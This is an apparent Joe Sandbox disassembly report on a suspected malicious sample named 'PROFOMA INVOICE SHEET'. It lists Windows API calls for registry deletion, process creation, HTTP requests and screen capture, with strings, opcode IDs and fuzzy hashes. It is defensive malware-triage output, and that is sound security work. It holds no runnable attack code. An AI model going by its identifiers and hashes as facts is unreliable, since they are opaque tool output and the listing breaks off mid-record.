                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00390A54
                                    • _wcslen.LIBCMT ref: 00390A8A
                                    • _wcslen.LIBCMT ref: 00390B06
                                    • _wcslen.LIBCMT ref: 00390B81
                                      • Part of subcall function 0031F9F2: _wcslen.LIBCMT ref: 0031F9FD
                                      • Part of subcall function 00362BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00362BFA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: _wcslen$MessageSend$BuffCharUpper
                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                    • API String ID: 1103490817-4258414348
                                    • Opcode ID: 0ecbf6bc387b5973061b1a3acfe34f7d334c44562696f1dbd9ee2ada5ee56b1d
                                    • Instruction ID: ab19c8432f3b1d2c58ab62350f9a16a11cca99d33e4fe8ca9001dec29e3998a9
                                    • Instruction Fuzzy Hash: BEE1CF362087018FCB1AEF28C45096AB7E5FF98314F15895CF8969B7A2DB31ED45CB81
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: _wcslen$BuffCharUpper
                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                    • API String ID: 1256254125-909552448
                                    • Opcode ID: 2566e5c24cbe75e48517b41eab3b8953b2d7b1e0a28844b124c327f436dcf889
                                    • Instruction ID: 8004eed8ec49ad1b221acb3e3a3c6b0238aaff5a9bbd4f270c471fa09927fda7
                                    • Instruction Fuzzy Hash: 0671193262062A8BCB17FE7CD8516BB33A5AF60750F1211A9FC659B284E735CD45C7B0
                                    APIs
                                    • _wcslen.LIBCMT ref: 0039835A
                                    • _wcslen.LIBCMT ref: 0039836E
                                    • _wcslen.LIBCMT ref: 00398391
                                    • _wcslen.LIBCMT ref: 003983B4
                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 003983F2
                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,0039361A,?), ref: 0039844E
                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00398487
                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 003984CA
                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00398501
                                    • FreeLibrary.KERNEL32(?), ref: 0039850D
                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0039851D
                                    • DestroyIcon.USER32(?), ref: 0039852C
                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00398549
                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00398555
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                    • String ID: .dll$.exe$.icl
                                    • API String ID: 799131459-1154884017
                                    • Opcode ID: c0717a206dffc67660ed922506bdccea835f538ff2ef4731c039486e0d3e7ab6
                                    • Instruction ID: 2313d3085b9b4c91c34bed3b6dc019ef1605e2793487c23f39d6f0273dee6a44
                                    • Instruction Fuzzy Hash: 8261DF72500215BAEF16DF65DC81BFE77ACBF4AB21F10460AF815DA0D1DB74A990CBA0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                    • API String ID: 0-1645009161
                                    • Opcode ID: 227fe3bc3998401c0ec199b0063d30944fbd70d08ce6047db42b8a723c2553d9
                                    • Instruction ID: e761dc2872966fbaceabfe5008d541e051849b3283133dcf1e23c4c7d9445ecd
                                    • Instruction Fuzzy Hash: AA81ED71A06205BBDF23AF60DC52FBE3BA8AF54740F054025F805AE1D2EB71EA51C6A1
                                    APIs
                                    • LoadIconW.USER32(00000063), ref: 00365A2E
                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00365A40
                                    • SetWindowTextW.USER32(?,?), ref: 00365A57
                                    • GetDlgItem.USER32(?,000003EA), ref: 00365A6C
                                    • SetWindowTextW.USER32(00000000,?), ref: 00365A72
                                    • GetDlgItem.USER32(?,000003E9), ref: 00365A82
                                    • SetWindowTextW.USER32(00000000,?), ref: 00365A88
                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00365AA9
                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00365AC3
                                    • GetWindowRect.USER32(?,?), ref: 00365ACC
                                    • _wcslen.LIBCMT ref: 00365B33
                                    • SetWindowTextW.USER32(?,?), ref: 00365B6F
                                    • GetDesktopWindow.USER32 ref: 00365B75
                                    • GetWindowRect.USER32(00000000), ref: 00365B7C
                                    • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00365BD3
                                    • GetClientRect.USER32(?,?), ref: 00365BE0
                                    • PostMessageW.USER32(?,00000005,00000000,?), ref: 00365C05
                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00365C2F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                    • String ID:
                                    • API String ID: 895679908-0
                                    • Opcode ID: f47b9cd74c98f67d5b12dfdd9fbf94699ef5f3ea59358403156296b519051fca
                                    • Instruction ID: 97890782a75a04550bf6101cff38a2ec1c7bb691854abe420f20c395d2a8dadb
                                    • Opcode Fuzzy Hash: f47b9cd74c98f67d5b12dfdd9fbf94699ef5f3ea59358403156296b519051fca
                                    • Instruction Fuzzy Hash: D5718031900B09AFDB22DFA8CE85A6EBBF9FF48704F104529E142A75A4D775E944CF50
                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: _wcslen
                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[<
                                    • API String ID: 176396367-3478203385
                                    • Opcode ID: 57fd8d86d176db6aa139387a894b0dca9496f79f78953031ca670bc22f8dcada
                                    • Instruction ID: 00955ee4994fff36316b7adfca90778dbe3993687d722a7782bfd01c603a55df
                                    • Opcode Fuzzy Hash: 57fd8d86d176db6aa139387a894b0dca9496f79f78953031ca670bc22f8dcada
                                    • Instruction Fuzzy Hash: 46E1F532A00626ABCB1BDF68C451BEEFBB4BF45710F25C119E556E7244DF30AE858790
                                    APIs
                                    • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 003200C6
                                      • Part of subcall function 003200ED: InitializeCriticalSectionAndSpinCount.KERNEL32(003D070C,00000FA0,74BAA25B,?,?,?,?,003423B3,000000FF), ref: 0032011C
                                      • Part of subcall function 003200ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,003423B3,000000FF), ref: 00320127
                                      • Part of subcall function 003200ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,003423B3,000000FF), ref: 00320138
                                      • Part of subcall function 003200ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0032014E
                                      • Part of subcall function 003200ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0032015C
                                      • Part of subcall function 003200ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0032016A
                                      • Part of subcall function 003200ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00320195
                                      • Part of subcall function 003200ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 003201A0
                                    • ___scrt_fastfail.LIBCMT ref: 003200E7
                                      • Part of subcall function 003200A3: __onexit.LIBCMT ref: 003200A9
                                    Strings
                                    • InitializeConditionVariable, xrefs: 00320148
                                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00320122
                                    • kernel32.dll, xrefs: 00320133
                                    • WakeAllConditionVariable, xrefs: 00320162
                                    • SleepConditionVariableCS, xrefs: 00320154
                                    Similarity
                                    • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                    • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                    • API String ID: 66158676-1714406822
                                    • Opcode ID: 4830ac6874d5c08645e953e42c89d9c3d3dc758d64b10e73e9aeba00f2a2137a
                                    • Instruction ID: 78ae1cce0065a6aecf6f2b9445f66b220cb898ad7aa70a6b3d91445c84ec4980
                                    • Opcode Fuzzy Hash: 4830ac6874d5c08645e953e42c89d9c3d3dc758d64b10e73e9aeba00f2a2137a
                                    • Instruction Fuzzy Hash: 03210B366457216FE71B6B74BC06BAE739CDB05F51F010137F805EA292DB71AC048A94
                                    APIs
                                    • CharLowerBuffW.USER32(00000000,00000000,0039CC08), ref: 00374527
                                    • _wcslen.LIBCMT ref: 0037453B
                                    • _wcslen.LIBCMT ref: 00374599
                                    • _wcslen.LIBCMT ref: 003745F4
                                    • _wcslen.LIBCMT ref: 0037463F
                                    • _wcslen.LIBCMT ref: 003746A7
                                      • Part of subcall function 0031F9F2: _wcslen.LIBCMT ref: 0031F9FD
                                    • GetDriveTypeW.KERNEL32(?,003C6BF0,00000061), ref: 00374743
                                    Strings
                                    Similarity
                                    • API ID: _wcslen$BuffCharDriveLowerType
                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                    • API String ID: 2055661098-1000479233
                                    • Opcode ID: 827fc2e10b70d714ff9e61daa916ef1b5805d40287e36b76e5d2495d8636ac97
                                    • Instruction ID: abb59fd501e1685f45c61b76e050a8be38affe1e42fbbb06b23974cef23988b9
                                    • Opcode Fuzzy Hash: 827fc2e10b70d714ff9e61daa916ef1b5805d40287e36b76e5d2495d8636ac97
                                    • Instruction Fuzzy Hash: D5B116316083029FC726DF28C891A6EB7E5BF96720F51891DF4AACB291D734EC44CB52
                                    APIs
                                      • Part of subcall function 00319BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00319BB2
                                    • DragQueryPoint.SHELL32(?,?), ref: 00399147
                                      • Part of subcall function 00397674: ClientToScreen.USER32(?,?), ref: 0039769A
                                      • Part of subcall function 00397674: GetWindowRect.USER32(?,?), ref: 00397710
                                      • Part of subcall function 00397674: PtInRect.USER32(?,?,00398B89), ref: 00397720
                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 003991B0
                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 003991BB
                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 003991DE
                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00399225
                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0039923E
                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00399255
                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00399277
                                    • DragFinish.SHELL32(?), ref: 0039927E
                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00399371
                                    Strings
                                    Similarity
                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#=
                                    • API String ID: 221274066-673275980
                                    • Opcode ID: d8a05b13f3d33b80d8b736044c60cbd6b1eb7d84ba621380fcc47bcd71bccdb0
                                    • Instruction ID: 49314b8668127a88da0c4a3cda082e2c620a0a15d7e7a06874873559d23db3ce
                                    • Opcode Fuzzy Hash: d8a05b13f3d33b80d8b736044c60cbd6b1eb7d84ba621380fcc47bcd71bccdb0
                                    • Instruction Fuzzy Hash: F861AC72108301AFD702EF64DC95EAFBBE8EF89750F00091EF591971A1DB309A48CB62
                                    APIs
                                    • _wcslen.LIBCMT ref: 0038B198
                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0038B1B0
                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0038B1D4
                                    • _wcslen.LIBCMT ref: 0038B200
                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0038B214
                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0038B236
                                    • _wcslen.LIBCMT ref: 0038B332
                                      • Part of subcall function 003705A7: GetStdHandle.KERNEL32(000000F6), ref: 003705C6
                                    • _wcslen.LIBCMT ref: 0038B34B
                                    • _wcslen.LIBCMT ref: 0038B366
                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0038B3B6
                                    • GetLastError.KERNEL32(00000000), ref: 0038B407
                                    • CloseHandle.KERNEL32(?), ref: 0038B439
                                    • CloseHandle.KERNEL32(00000000), ref: 0038B44A
                                    • CloseHandle.KERNEL32(00000000), ref: 0038B45C
                                    • CloseHandle.KERNEL32(00000000), ref: 0038B46E
                                    • CloseHandle.KERNEL32(?), ref: 0038B4E3
                                    Similarity
                                    • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                    • String ID:
                                    • API String ID: 2178637699-0
                                    • Opcode ID: a3f3dffe60fc9054f6881b29de71d7f5c5bd57437733f144fb083c3762a4ad3c
                                    • Instruction ID: 1b77b0adf61e4f834a1b94f1b05fa812b7f64031f617bdd7d2d3995ea04f8e40
                                    • Opcode Fuzzy Hash: a3f3dffe60fc9054f6881b29de71d7f5c5bd57437733f144fb083c3762a4ad3c
                                    • Instruction Fuzzy Hash: FCF19E715083019FCB16EF24C891B6EBBE5AF85314F19899DF4999F2A2CB31EC41CB52
                                    APIs
                                    • GetMenuItemCount.USER32(003D1990), ref: 00342F8D
                                    • GetMenuItemCount.USER32(003D1990), ref: 0034303D
                                    • GetCursorPos.USER32(?), ref: 00343081
                                    • SetForegroundWindow.USER32(00000000), ref: 0034308A
                                    • TrackPopupMenuEx.USER32(003D1990,00000000,?,00000000,00000000,00000000), ref: 0034309D
                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 003430A9
                                    Strings
                                    Similarity
                                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                    • String ID: 0
                                    • API String ID: 36266755-4108050209
                                    • Opcode ID: 93a5790159a7872772ec0bfcabe2b4ee99c0510974ed62d0dfce037dd1146348
                                    • Instruction ID: 39326caf822522600cb41fe3553b6e311b57880e88b57001cee896cf72da61c6
                                    • Opcode Fuzzy Hash: 93a5790159a7872772ec0bfcabe2b4ee99c0510974ed62d0dfce037dd1146348
                                    • Instruction Fuzzy Hash: BA71F431645205BEEB238F65CC59FAABFACFF05324F204216F515AE1E0C7B2A954CB50
                                    APIs
                                    • DestroyWindow.USER32(?,?), ref: 00396DEB
                                      • Part of subcall function 00306B57: _wcslen.LIBCMT ref: 00306B6A
                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00396E5F
                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00396E81
                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00396E94
                                    • DestroyWindow.USER32(?), ref: 00396EB5
                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00300000,00000000), ref: 00396EE4
                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00396EFD
                                    • GetDesktopWindow.USER32 ref: 00396F16
                                    • GetWindowRect.USER32(00000000), ref: 00396F1D
                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00396F35
                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00396F4D
                                      • Part of subcall function 00319944: GetWindowLongW.USER32(?,000000EB), ref: 00319952
                                    Strings
                                    Similarity
                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                    • String ID: 0$tooltips_class32
                                    • API String ID: 2429346358-3619404913
                                    • Opcode ID: 17e015b4276540a93bb5533149c80432d8e7705f7430c36e2b2f2e5002812fab
                                    • Instruction ID: e3a498311d97f9a5092847082ee3c6159d39026cb151cb621a67a26793395618
                                    • Opcode Fuzzy Hash: 17e015b4276540a93bb5533149c80432d8e7705f7430c36e2b2f2e5002812fab
                                    • Instruction Fuzzy Hash: 21715874505244AFDB22CF18EC69FBABBE9FB89304F44041EF99A87261C771E906CB51
                                    APIs
                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0037C4B0
                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0037C4C3
                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0037C4D7
                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0037C4F0
                                    • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0037C533
                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0037C549
                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0037C554
                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0037C584
                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0037C5DC
                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0037C5F0
                                    • InternetCloseHandle.WININET(00000000), ref: 0037C5FB
                                    Strings
                                    Similarity
                                    • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                    • String ID:
                                    • API String ID: 3800310941-3916222277
                                    • Opcode ID: d8f900aa760dff961f525a6c9fb0e9a6dd13469c5ef1ad7c2be053f2799b9cd9
                                    • Instruction ID: 49113ad6de594f552479e9be13c16746e100e32f621cb0c5f569727fb5aba31d
                                    • Opcode Fuzzy Hash: d8f900aa760dff961f525a6c9fb0e9a6dd13469c5ef1ad7c2be053f2799b9cd9
                                    • Instruction Fuzzy Hash: 3C514FB1510608BFDB328FA1C988AAB7BBCFF09754F00941EF94996510D73AE944DB60
                                    APIs
                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00398592
                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 003985A2
                                    • GlobalAlloc.KERNEL32(00000002,00000000), ref: 003985AD
                                    • CloseHandle.KERNEL32(00000000), ref: 003985BA
                                    • GlobalLock.KERNEL32(00000000), ref: 003985C8
                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 003985D7
                                    • GlobalUnlock.KERNEL32(00000000), ref: 003985E0
                                    • CloseHandle.KERNEL32(00000000), ref: 003985E7
                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 003985F8
                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,0039FC38,?), ref: 00398611
                                    • GlobalFree.KERNEL32(00000000), ref: 00398621
                                    • GetObjectW.GDI32(?,00000018,000000FF), ref: 00398641
                                    • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00398671
                                    • DeleteObject.GDI32(00000000), ref: 00398699
                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 003986AF
                                    Similarity
                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                    • String ID:
                                    • API String ID: 3840717409-0
                                    • Opcode ID: 5f3e8eb52625c7d2a620a88c46788eb5882b95afe186c2ce5df47ecfd92d51a9
                                    • Instruction ID: 04acf75746a4cbc8c137d7666688596b608a5a17b0896fda4809ee90d5889ae9
                                    • Opcode Fuzzy Hash: 5f3e8eb52625c7d2a620a88c46788eb5882b95afe186c2ce5df47ecfd92d51a9
                                    • Instruction Fuzzy Hash: 2A413A75600208AFDB12DFA5CC88EAA7BBCFF8A711F114459F905EB260DB319D05CB20
                                    APIs
                                    • VariantInit.OLEAUT32(00000000), ref: 00371502
                                    • VariantCopy.OLEAUT32(?,?), ref: 0037150B
                                    • VariantClear.OLEAUT32(?), ref: 00371517
                                    • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 003715FB
                                    • VarR8FromDec.OLEAUT32(?,?), ref: 00371657
                                    • VariantInit.OLEAUT32(?), ref: 00371708
                                    • SysFreeString.OLEAUT32(?), ref: 0037178C
                                    • VariantClear.OLEAUT32(?), ref: 003717D8
                                    • VariantClear.OLEAUT32(?), ref: 003717E7
                                    • VariantInit.OLEAUT32(00000000), ref: 00371823
                                    Strings
                                    Similarity
                                    • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                    • String ID: %4d%02d%02d%02d%02d%02d$Default
                                    • API String ID: 1234038744-3931177956
                                    • Opcode ID: 51bd0f4f6eb650c3e46383a5a838e97ef2f4ded8a23e747414b8d1ec999f0f15
                                    • Instruction ID: bd235da55b791da039c93c29c59eae0fe1cd43bf7ae8afffc66f340a5c610895
                                    • Opcode Fuzzy Hash: 51bd0f4f6eb650c3e46383a5a838e97ef2f4ded8a23e747414b8d1ec999f0f15
                                    • Instruction Fuzzy Hash: 17D10472A00105DBDF2A9F69D885BB9B7B9BF4A710F14C05AE40AAF580DB38DC41DB51
                                    APIs
                                      • Part of subcall function 00309CB3: _wcslen.LIBCMT ref: 00309CBD
                                      • Part of subcall function 0038C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0038B6AE,?,?), ref: 0038C9B5
                                      • Part of subcall function 0038C998: _wcslen.LIBCMT ref: 0038C9F1
                                      • Part of subcall function 0038C998: _wcslen.LIBCMT ref: 0038CA68
                                      • Part of subcall function 0038C998: _wcslen.LIBCMT ref: 0038CA9E
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0038B6F4
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0038B772
                                    • RegDeleteValueW.ADVAPI32(?,?), ref: 0038B80A
                                    • RegCloseKey.ADVAPI32(?), ref: 0038B87E
                                    • RegCloseKey.ADVAPI32(?), ref: 0038B89C
                                    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0038B8F2
                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0038B904
                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 0038B922
                                    • FreeLibrary.KERNEL32(00000000), ref: 0038B983
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0038B994
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                    • API String ID: 146587525-4033151799
                                    • Opcode ID: 9f5674bad3acff08658601e58ce441e95539370159f705860caf8088a6ffce28
                                    • Instruction ID: 2e52d8f3adfe33ad2642a615c290d8bece86c2a15f4f7e8d2da3298cfc2e6238
                                    • Opcode Fuzzy Hash: 9f5674bad3acff08658601e58ce441e95539370159f705860caf8088a6ffce28
                                    • Instruction Fuzzy Hash: 38C17B34205342AFD712EF24C495F2ABBE5BF84318F15859CF59A8B2A2CB31ED45CB91
                                    APIs
                                    • GetDC.USER32(00000000), ref: 003825D8
                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 003825E8
                                    • CreateCompatibleDC.GDI32(?), ref: 003825F4
                                    • SelectObject.GDI32(00000000,?), ref: 00382601
                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0038266D
                                    • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 003826AC
                                    • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 003826D0
                                    • SelectObject.GDI32(?,?), ref: 003826D8
                                    • DeleteObject.GDI32(?), ref: 003826E1
                                    • DeleteDC.GDI32(?), ref: 003826E8
                                    • ReleaseDC.USER32(00000000,?), ref: 003826F3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                    • String ID: (
                                    • API String ID: 2598888154-3887548279
                                    • Opcode ID: 6a520480ca2d12ee1b31e6bb9831db5617304610b33e60304edd18e8786c3d0c
                                    • Instruction ID: 6a2698b2bcc11f42632282d2b54b59152bca763bfb38f517cd86a2900b4f2e9f
